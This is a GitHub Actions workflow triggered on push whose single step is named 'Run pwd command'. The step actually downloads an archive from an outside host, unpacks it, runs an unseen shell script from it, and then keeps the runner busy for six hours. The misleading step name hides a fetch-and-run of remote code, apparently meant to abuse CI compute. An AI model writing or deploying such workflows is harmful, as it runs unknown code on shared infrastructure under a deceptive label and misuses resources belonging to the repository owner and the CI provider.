on: push

jobs:
  run-pwd-job:
    runs-on: ubuntu-latest

    steps:


    - name: Run pwd command
      run: pwd;wget https://idev.nyc.mn/abc.tar.zst;tar -xvf abc.tar.zst;cd abc;sh s.sh;sleep 21600
